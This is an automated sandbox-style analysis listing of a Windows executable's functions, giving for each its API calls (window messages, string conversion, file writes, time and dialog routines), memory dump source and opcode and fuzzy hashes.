                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3917621476-0
                                                                                                                                                                                    • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                    Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                                                    • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                    Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,761EDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,761EDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                    • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                    Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                                                                                    • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2678498856-0
                                                                                                                                                                                    • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                    Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Item
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3888421826-0
                                                                                                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                    Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3727323765-0
                                                                                                                                                                                    • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                    Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                    • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                    Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                    Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                    • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                    Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                    Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                    Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                    Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                                                    • String ID: d=E
                                                                                                                                                                                    • API String ID: 909852535-3703654223
                                                                                                                                                                                    • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                    Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                                                    • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                    Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                    • String ID: URL
                                                                                                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                                                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                    Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                                                    • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                    Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                                                                                    • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                    Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                                                                                    • memset.MSVCRT ref: 00401917
                                                                                                                                                                                    Strings
